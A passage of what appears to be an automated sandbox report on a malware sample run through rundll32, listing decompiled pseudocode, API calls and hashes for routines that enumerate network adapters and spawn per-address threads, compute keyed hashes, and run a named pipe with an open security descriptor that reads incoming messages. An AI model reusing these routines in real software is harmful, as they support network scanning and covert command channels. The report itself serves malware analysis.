                                                                                                                                                  							_t105 =  *(_t125 + 0x1020 + _t108 * 8) & _t109;
                                                                                                                                                  							if(_t105 != 0) {
                                                                                                                                                  								_t80 = _t77 ^ _t109 | _t105;
                                                                                                                                                  								_v16 = _t80;
                                                                                                                                                  								if(_t80 != 0) {
                                                                                                                                                  									_t81 =  *_t113(_t105);
                                                                                                                                                  									 *_t117 = _t81;
                                                                                                                                                  									 *((intOrPtr*)(_t117 + 4)) =  *_t113(_v20);
                                                                                                                                                  									 *((intOrPtr*)(_t117 + 8)) = _a4;
                                                                                                                                                  									_t84 = CreateThread(_t101, _t101, E04778AB3, _t117, _t101, _t101); // executed
                                                                                                                                                  									if(_t84 != _t101) {
                                                                                                                                                  										 *(_t125 + 0x20 + _v32 * 4) = _t84;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						_v16 = _v16 + 1;
                                                                                                                                                  					} while (_v16 < _v20);
                                                                                                                                                  					goto L20;
                                                                                                                                                  				}
                                                                                                                                                  			}
































                                                                                                                                                  0x04778b39
                                                                                                                                                  0x04778b41
                                                                                                                                                  0x04778b4e
                                                                                                                                                  0x04778b52
                                                                                                                                                  0x04778b68
                                                                                                                                                  0x04778b6f
                                                                                                                                                  0x04778b74
                                                                                                                                                  0x04778b7a
                                                                                                                                                  0x04778b83
                                                                                                                                                  0x04778b87
                                                                                                                                                  0x04778b8b
                                                                                                                                                  0x04778b8f
                                                                                                                                                  0x04778b94
                                                                                                                                                  0x04778d2e
                                                                                                                                                  0x04778d36
                                                                                                                                                  0x04778d36
                                                                                                                                                  0x04778ba6
                                                                                                                                                  0x04778ba8
                                                                                                                                                  0x04778bae
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778bba
                                                                                                                                                  0x04778bbe
                                                                                                                                                  0x04778d24
                                                                                                                                                  0x04778d28
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778d28
                                                                                                                                                  0x04778bc4
                                                                                                                                                  0x04778c37
                                                                                                                                                  0x04778c39
                                                                                                                                                  0x04778c40
                                                                                                                                                  0x04778c45
                                                                                                                                                  0x04778c4b
                                                                                                                                                  0x04778c52
                                                                                                                                                  0x04778c63
                                                                                                                                                  0x04778c63
                                                                                                                                                  0x04778c4b
                                                                                                                                                  0x04778c69
                                                                                                                                                  0x04778c6b
                                                                                                                                                  0x04778c71
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778c71
                                                                                                                                                  0x04778c77
                                                                                                                                                  0x04778c7e
                                                                                                                                                  0x04778c83
                                                                                                                                                  0x04778c83
                                                                                                                                                  0x04778c8c
                                                                                                                                                  0x04778d0d
                                                                                                                                                  0x04778d11
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778d13
                                                                                                                                                  0x04778d13
                                                                                                                                                  0x04778d17
                                                                                                                                                  0x04778d1d
                                                                                                                                                  0x04778d1e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778c8e
                                                                                                                                                  0x04778c8e
                                                                                                                                                  0x04778c94
                                                                                                                                                  0x04778c98
                                                                                                                                                  0x04778c9e
                                                                                                                                                  0x04778ca2
                                                                                                                                                  0x04778ca9
                                                                                                                                                  0x04778caf
                                                                                                                                                  0x04778cba
                                                                                                                                                  0x04778cc1
                                                                                                                                                  0x04778cc3
                                                                                                                                                  0x04778cc7
                                                                                                                                                  0x04778cc9
                                                                                                                                                  0x04778ccd
                                                                                                                                                  0x04778cd0
                                                                                                                                                  0x04778cd6
                                                                                                                                                  0x04778ce2
                                                                                                                                                  0x04778cea
                                                                                                                                                  0x04778ced
                                                                                                                                                  0x04778cf5
                                                                                                                                                  0x04778cfb
                                                                                                                                                  0x04778cfb
                                                                                                                                                  0x04778cf5
                                                                                                                                                  0x04778ccd
                                                                                                                                                  0x04778cc3
                                                                                                                                                  0x04778cff
                                                                                                                                                  0x04778d07
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778c94

                                                                                                                                                  APIs
                                                                                                                                                  • memset.MSVCRT ref: 04778B52
                                                                                                                                                  • memset.MSVCRT ref: 04778B6F
                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04778B8F
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 04778BA0
                                                                                                                                                  • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 04778BBA
                                                                                                                                                  • inet_addr.WS2_32(000001B0), ref: 04778BDF
                                                                                                                                                  • inet_addr.WS2_32(000001C0), ref: 04778BF3
                                                                                                                                                    • Part of subcall function 0477641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74164AB0,?), ref: 04776439
                                                                                                                                                    • Part of subcall function 0477641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 04776446
                                                                                                                                                    • Part of subcall function 0477641A: HeapAlloc.KERNEL32(00000000), ref: 0477644D
                                                                                                                                                    • Part of subcall function 0477641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04776465
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,000001B0), ref: 04778C24
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04778C2B
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,00000200,000001B0), ref: 04778C5C
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04778C63
                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,0000000C), ref: 04778C98
                                                                                                                                                  • inet_addr.WS2_32(255.255.255.255), ref: 04778CA9
                                                                                                                                                  • htonl.WS2_32(?), ref: 04778CD0
                                                                                                                                                  • htonl.WS2_32(?), ref: 04778CD8
                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00008AB3,00000000,00000000,00000000), ref: 04778CED
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 04778D17
                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 04778D28
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$AllocFreeLocalProcessinet_addr$AdaptersByteCharInfoMultiWidehtonlmemset$CloseCreateHandleThread
                                                                                                                                                  • String ID: 255.255.255.255
                                                                                                                                                  • API String ID: 698255058-2422070025
                                                                                                                                                  • Opcode ID: de5bd1821318845c9ca3ffe33dbcaa8ab344cdba094b658374abc0849a4fce33
                                                                                                                                                  • Instruction ID: 7291f01804168a94375aa2f0664a96dad2a675025f9580ed2cfa8cfe3edb5031
                                                                                                                                                  • Opcode Fuzzy Hash: de5bd1821318845c9ca3ffe33dbcaa8ab344cdba094b658374abc0849a4fce33
                                                                                                                                                  • Instruction Fuzzy Hash: 605173B1504306AFDB10EF60D98899FBBE9FF88354F91892DF695D2200D734E949CB92
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 278 47715a7-47715eb GetProcessHeap HeapAlloc 279 47715f1-477160b CryptAcquireContextW 278->279 280 477173d-4771744 278->280 279->280 281 4771611-477161b 279->281 282 4771621-4771622 281->282 283 47716be-47716d2 CryptCreateHash 281->283 286 4771710 282->286 287 4771628-477163c GetProcessHeap HeapAlloc 282->287 284 47716d4 283->284 285 4771712-4771715 283->285 289 47716d8-47716dc 284->289 290 4771717-477171a CryptDestroyHash 285->290 291 4771720-4771723 285->291 286->285 287->286 288 4771642-4771676 CryptImportKey 287->288 292 47716aa-47716bc GetProcessHeap HeapFree 288->292 293 4771678-4771690 CryptCreateHash 288->293 289->285 294 47716de-47716f0 CryptHashData 289->294 290->291 295 4771725-4771728 CryptDestroyKey 291->295 296 477172e-4771731 291->296 292->289 293->292 298 4771692-47716a4 CryptSetHashParam 293->298 294->285 299 47716f2-4771709 CryptGetHashParam 294->299 295->296 296->280 297 4771733-4771737 CryptReleaseContext 296->297 297->280 298->292 300 47716a6 298->300 299->285 301 477170b-477170e 299->301 300->292 301->285
                                                                                                                                                  C-Code - Quality: 21%
                                                                                                                                                  			E047715A7(intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16, intOrPtr _a20) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				long* _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				long* _v20;
                                                                                                                                                  				long _v24;
                                                                                                                                                  				char _v44;
                                                                                                                                                  				void* _t45;
                                                                                                                                                  				long** _t47;
                                                                                                                                                  				int _t48;
                                                                                                                                                  				void** _t52;
                                                                                                                                                  				int _t56;
                                                                                                                                                  				char* _t58;
                                                                                                                                                  				char* _t59;
                                                                                                                                                  				void* _t61;
                                                                                                                                                  				void* _t64;
                                                                                                                                                  				long _t70;
                                                                                                                                                  				int _t71;
                                                                                                                                                  
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				_t70 = 0x10;
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				_v24 = _t70;
                                                                                                                                                  				_v16 = 0xbadf00d;
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				_t45 = HeapAlloc(GetProcessHeap(), 8, _t70);
                                                                                                                                                  				 *_a16 = _t45;
                                                                                                                                                  				if(_t45 == 0) {
                                                                                                                                                  					L23:
                                                                                                                                                  					return _v16;
                                                                                                                                                  				}
                                                                                                                                                  				_t47 =  &_v12;
                                                                                                                                                  				__imp__CryptAcquireContextW(_t47, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000008); // executed
                                                                                                                                                  				if(_t47 == 0) {
                                                                                                                                                  					goto L23;
                                                                                                                                                  				}
                                                                                                                                                  				_t48 = 0x8002;
                                                                                                                                                  				_t64 = _a20 - 0x8002;
                                                                                                                                                  				if(_t64 == 0) {
                                                                                                                                                  					_t71 = 0;
                                                                                                                                                  					__imp__CryptCreateHash(_v12, 0x8002, 0, 0,  &_v8); // executed
                                                                                                                                                  					if(0x8002 == 0) {
                                                                                                                                                  						L17:
                                                                                                                                                  						if(_v8 != _t71) {
                                                                                                                                                  							__imp__CryptDestroyHash(_v8);
                                                                                                                                                  						}
                                                                                                                                                  						if(_v20 != _t71) {
                                                                                                                                                  							CryptDestroyKey(_v20);
                                                                                                                                                  						}
                                                                                                                                                  						if(_v12 != _t71) {
                                                                                                                                                  							CryptReleaseContext(_v12, _t71);
                                                                                                                                                  						}
                                                                                                                                                  						goto L23;
                                                                                                                                                  					}
                                                                                                                                                  					_v16 = _v16 | 0xffffffff;
                                                                                                                                                  					L12:
                                                                                                                                                  					if(_v16 == 0xffffffff) {
                                                                                                                                                  						__imp__CryptHashData(_v8, _a4, _a8, _t71);
                                                                                                                                                  						if(_t48 != 0) {
                                                                                                                                                  							_t52 = _a16;
                                                                                                                                                  							__imp__CryptGetHashParam(_v8, 2,  *_t52,  &_v24, _t71);
                                                                                                                                                  							if(_t52 != 0) {
                                                                                                                                                  								_v16 = _t71;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					goto L17;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t64 != 1) {
                                                                                                                                                  					L16:
                                                                                                                                                  					_t71 = 0;
                                                                                                                                                  					goto L17;
                                                                                                                                                  				}
                                                                                                                                                  				_v44 = 0x8003;
                                                                                                                                                  				_t61 = HeapAlloc(GetProcessHeap(), 8, 0x20);
                                                                                                                                                  				if(_t61 == 0) {
                                                                                                                                                  					goto L16;
                                                                                                                                                  				}
                                                                                                                                                  				 *(_t61 + 8) = _t70;
                                                                                                                                                  				 *_t61 = 0x208;
                                                                                                                                                  				 *((intOrPtr*)(_t61 + 4)) = 0x6602;
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				_t56 = CryptImportKey(_v12, _t61, 0x20, 0, 0x100,  &_v20); // executed
                                                                                                                                                  				if(_t56 != 0) {
                                                                                                                                                  					_t58 =  &_v8;
                                                                                                                                                  					__imp__CryptCreateHash(_v12, 0x8009, _v20, 0, _t58);
                                                                                                                                                  					if(_t58 != 0) {
                                                                                                                                                  						_t59 =  &_v44;
                                                                                                                                                  						__imp__CryptSetHashParam(_v8, 5, _t59, 0);
                                                                                                                                                  						if(_t59 != 0) {
                                                                                                                                                  							_v16 = _v16 | 0xffffffff;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t48 = HeapFree(GetProcessHeap(), 8, _t61);
                                                                                                                                                  				_t71 = 0;
                                                                                                                                                  				goto L12;
                                                                                                                                                  			}




















                                                                                                                                                  0x047715b8
                                                                                                                                                  0x047715bb
                                                                                                                                                  0x047715be
                                                                                                                                                  0x047715c4
                                                                                                                                                  0x047715c5
                                                                                                                                                  0x047715c8
                                                                                                                                                  0x047715c9
                                                                                                                                                  0x047715ca
                                                                                                                                                  0x047715ce
                                                                                                                                                  0x047715d1
                                                                                                                                                  0x047715d8
                                                                                                                                                  0x047715e2
                                                                                                                                                  0x047715e7
                                                                                                                                                  0x047715eb
                                                                                                                                                  0x0477173d
                                                                                                                                                  0x04771744
                                                                                                                                                  0x04771744
                                                                                                                                                  0x047715ff
                                                                                                                                                  0x04771603
                                                                                                                                                  0x0477160b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771614
                                                                                                                                                  0x04771619
                                                                                                                                                  0x0477161b
                                                                                                                                                  0x047716c2
                                                                                                                                                  0x047716ca
                                                                                                                                                  0x047716d2
                                                                                                                                                  0x04771712
                                                                                                                                                  0x04771715
                                                                                                                                                  0x0477171a
                                                                                                                                                  0x0477171a
                                                                                                                                                  0x04771723
                                                                                                                                                  0x04771728
                                                                                                                                                  0x04771728
                                                                                                                                                  0x04771731
                                                                                                                                                  0x04771737
                                                                                                                                                  0x04771737
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771731
                                                                                                                                                  0x047716d4
                                                                                                                                                  0x047716d8
                                                                                                                                                  0x047716dc
                                                                                                                                                  0x047716e8
                                                                                                                                                  0x047716f0
                                                                                                                                                  0x047716f7
                                                                                                                                                  0x04771701
                                                                                                                                                  0x04771709
                                                                                                                                                  0x0477170b
                                                                                                                                                  0x0477170b
                                                                                                                                                  0x04771709
                                                                                                                                                  0x047716f0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047716dc
                                                                                                                                                  0x04771622
                                                                                                                                                  0x04771710
                                                                                                                                                  0x04771710
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771710
                                                                                                                                                  0x0477162c
                                                                                                                                                  0x04771638
                                                                                                                                                  0x0477163c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04771642
                                                                                                                                                  0x04771648
                                                                                                                                                  0x0477164e
                                                                                                                                                  0x04771658
                                                                                                                                                  0x04771659
                                                                                                                                                  0x0477165a
                                                                                                                                                  0x04771664
                                                                                                                                                  0x0477166e
                                                                                                                                                  0x04771676
                                                                                                                                                  0x04771678
                                                                                                                                                  0x04771688
                                                                                                                                                  0x04771690
                                                                                                                                                  0x04771693
                                                                                                                                                  0x0477169c
                                                                                                                                                  0x047716a4
                                                                                                                                                  0x047716a6
                                                                                                                                                  0x047716a6
                                                                                                                                                  0x047716a4
                                                                                                                                                  0x04771690
                                                                                                                                                  0x047716b4
                                                                                                                                                  0x047716ba
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000010,778C4620,?,74CB4F20), ref: 047715D9
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047715E2
                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000008), ref: 04771603
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000020), ref: 04771633
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04771636
                                                                                                                                                  • CryptImportKey.ADVAPI32(?,00000000,00000020,00000000,00000100,?), ref: 0477166E
                                                                                                                                                  • CryptCreateHash.ADVAPI32(?,00008009,?,00000000,?), ref: 04771688
                                                                                                                                                  • CryptSetHashParam.ADVAPI32(?,00000005,00008003,00000000), ref: 0477169C
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 047716AD
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 047716B4
                                                                                                                                                  • CryptCreateHash.ADVAPI32(?,00008002,00000000,00000000,?), ref: 047716CA
                                                                                                                                                  • CryptHashData.ADVAPI32(?,?,000000FF,00000000), ref: 047716E8
                                                                                                                                                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 04771701
                                                                                                                                                  • CryptDestroyHash.ADVAPI32(?), ref: 0477171A
                                                                                                                                                  • CryptDestroyKey.ADVAPI32(?), ref: 04771728
                                                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04771737
                                                                                                                                                  Strings
                                                                                                                                                  • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 047715F8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Crypt$HashHeap$Process$AllocContextCreateDestroyParam$AcquireDataFreeImportRelease
                                                                                                                                                  • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                  • API String ID: 2620112963-1948191093
                                                                                                                                                  • Opcode ID: bc0d6da3e4f3747a7551f50eb5adeef8c466785c5f9f6a423cd32791d54f80b5
                                                                                                                                                  • Instruction ID: 1efa0f933a7470ddd06f12a80cfab63474be6d95bfa5e79998d0f9ab2ab25d38
                                                                                                                                                  • Opcode Fuzzy Hash: bc0d6da3e4f3747a7551f50eb5adeef8c466785c5f9f6a423cd32791d54f80b5
                                                                                                                                                  • Instruction Fuzzy Hash: D6515C71A00219FBEF218FA5DC48AEEBB79FF08750F948465F515F6290DB709A01DBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                  			E04776FFE(WCHAR* _a4) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				long _v12;
                                                                                                                                                  				long _v16;
                                                                                                                                                  				struct _SECURITY_ATTRIBUTES _v28;
                                                                                                                                                  				struct _SECURITY_DESCRIPTOR* _t25;
                                                                                                                                                  				void* _t30;
                                                                                                                                                  				int _t31;
                                                                                                                                                  				int _t34;
                                                                                                                                                  				WCHAR* _t44;
                                                                                                                                                  				void* _t50;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				asm("stosd");
                                                                                                                                                  				_v28.nLength = 0xc;
                                                                                                                                                  				_v28.bInheritHandle = 0;
                                                                                                                                                  				_t25 = HeapAlloc(GetProcessHeap(), 8, 0x14);
                                                                                                                                                  				_v28.lpSecurityDescriptor = _t25;
                                                                                                                                                  				if(_t25 == 0 || InitializeSecurityDescriptor(_t25, 1) == 0 || SetSecurityDescriptorDacl(_v28.lpSecurityDescriptor, 1, 0, 0) == 0) {
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L3:
                                                                                                                                                  						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
                                                                                                                                                  						_v8 = _t30;
                                                                                                                                                  						if(_t30 == 0xffffffff) {
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  						L4:
                                                                                                                                                  						_t31 = ConnectNamedPipe(_t30, 0); // executed
                                                                                                                                                  						if(_t31 == 0) {
                                                                                                                                                  							L18:
                                                                                                                                                  							CloseHandle(_v8);
                                                                                                                                                  							do {
                                                                                                                                                  								goto L3;
                                                                                                                                                  							} while (_t30 == 0xffffffff);
                                                                                                                                                  							goto L4;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t50 = 0x1e;
                                                                                                                                                  							do {
                                                                                                                                                  								_t50 = _t50 - 1;
                                                                                                                                                  								_v12 = 0;
                                                                                                                                                  								_t34 = PeekNamedPipe(_v8, 0, 0, 0,  &_v12, 0); // executed
                                                                                                                                                  								if(_t34 == 0) {
                                                                                                                                                  									goto L9;
                                                                                                                                                  								}
                                                                                                                                                  								if(_v12 != 0) {
                                                                                                                                                  									_t51 = HeapAlloc(GetProcessHeap(), 8, _v12);
                                                                                                                                                  									if(_t51 != 0) {
                                                                                                                                                  										_v16 = 0;
                                                                                                                                                  										if(ReadFile(_v8, _t51, _v12,  &_v16, 0) != 0 && _v16 == _v12) {
                                                                                                                                                  											_t44 = StrChrW(_t51, 0x3a);
                                                                                                                                                  											if(_t44 != 0) {
                                                                                                                                                  												 *_t44 = 0;
                                                                                                                                                  												E047769AE(_t51,  &(_t44[1]), 2);
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										HeapFree(GetProcessHeap(), 0, _t51);
                                                                                                                                                  									}
                                                                                                                                                  									L17:
                                                                                                                                                  									FlushFileBuffers(_v8);
                                                                                                                                                  									DisconnectNamedPipe(_v8); // executed
                                                                                                                                                  									goto L18;
                                                                                                                                                  								}
                                                                                                                                                  								Sleep(0x3e8); // executed
                                                                                                                                                  								L9:
                                                                                                                                                  							} while (_t50 != 0);
                                                                                                                                                  							goto L17;
                                                                                                                                                  						}
                                                                                                                                                  						L3:
                                                                                                                                                  						_t30 = CreateNamedPipeW(_a4, 3, 6, 1, 0, 0, 0,  &_v28); // executed
                                                                                                                                                  						_v8 = _t30;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}














                                                                                                                                                  0x04777012
                                                                                                                                                  0x04777013
                                                                                                                                                  0x04777016
                                                                                                                                                  0x0477701b
                                                                                                                                                  0x04777022
                                                                                                                                                  0x04777028
                                                                                                                                                  0x0477702e
                                                                                                                                                  0x04777033
                                                                                                                                                  0x04777143
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477705f
                                                                                                                                                  0x0477705f
                                                                                                                                                  0x0477706f
                                                                                                                                                  0x04777075
                                                                                                                                                  0x0477707b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477707d
                                                                                                                                                  0x0477707f
                                                                                                                                                  0x04777087
                                                                                                                                                  0x0477712f
                                                                                                                                                  0x04777132
                                                                                                                                                  0x0477705f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477708d
                                                                                                                                                  0x0477708f
                                                                                                                                                  0x04777090
                                                                                                                                                  0x0477709b
                                                                                                                                                  0x0477709c
                                                                                                                                                  0x0477709f
                                                                                                                                                  0x047770a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047770ac
                                                                                                                                                  0x047770cd
                                                                                                                                                  0x047770d1
                                                                                                                                                  0x047770db
                                                                                                                                                  0x047770ea
                                                                                                                                                  0x047770f7
                                                                                                                                                  0x047770ff
                                                                                                                                                  0x04777103
                                                                                                                                                  0x0477710d
                                                                                                                                                  0x0477710d
                                                                                                                                                  0x047770ff
                                                                                                                                                  0x04777117
                                                                                                                                                  0x04777117
                                                                                                                                                  0x0477711d
                                                                                                                                                  0x04777120
                                                                                                                                                  0x04777129
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04777129
                                                                                                                                                  0x047770b3
                                                                                                                                                  0x047770b9
                                                                                                                                                  0x047770b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x047770bd
                                                                                                                                                  0x0477705f
                                                                                                                                                  0x0477706f
                                                                                                                                                  0x04777075
                                                                                                                                                  0x04777078
                                                                                                                                                  0x0477705f

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000014), ref: 04777025
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04777028
                                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0477703C
                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 04777051
                                                                                                                                                  • CreateNamedPipeW.KERNELBASE(?,00000003,00000006,00000001,00000000,00000000,00000000,0000000C), ref: 0477706F
                                                                                                                                                  • ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 0477707F
                                                                                                                                                  • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 0477709F
                                                                                                                                                  • Sleep.KERNELBASE(000003E8), ref: 047770B3
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 047770C4
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047770C7
                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 047770E2
                                                                                                                                                  • StrChrW.SHLWAPI(00000000,0000003A), ref: 047770F7
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04777114
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04777117
                                                                                                                                                  • FlushFileBuffers.KERNEL32(?), ref: 04777120
                                                                                                                                                  • DisconnectNamedPipe.KERNELBASE(?), ref: 04777129
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 04777132
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$NamedPipe$Process$AllocDescriptorFileSecurity$BuffersCloseConnectCreateDaclDisconnectFlushFreeHandleInitializePeekReadSleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1225799970-0
                                                                                                                                                  • Opcode ID: 3bf9756d005fb8c3adaac6d21347114700905373595cac1954090b3a3b9a0559
                                                                                                                                                  • Instruction ID: 1b2ed727ca137a766e7c70cd74359c125bcb0a16b825b2ba7acedd3e214b7e94
                                                                                                                                                  • Opcode Fuzzy Hash: 3bf9756d005fb8c3adaac6d21347114700905373595cac1954090b3a3b9a0559
                                                                                                                                                  • Instruction Fuzzy Hash: F7415C71A00218BBEF316BA1DC49EEFBF39EF45790F904854F605E6190DB74AA41DBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 40%
                                                                                                                                                  			E04775BC4(void* __eflags, void* _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                                  				void* _v8;
                                                                                                                                                  				int _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				int _v20;
                                                                                                                                                  				struct _SYSTEM_INFO _v56;
                                                                                                                                                  				void* _t43;
                                                                                                                                                  				long _t45;
                                                                                                                                                  				void* _t46;
                                                                                                                                                  				intOrPtr _t49;
                                                                                                                                                  				long _t52;
                                                                                                                                                  				void* _t53;
                                                                                                                                                  				long _t62;
                                                                                                                                                  				signed int _t63;
                                                                                                                                                  				intOrPtr _t76;
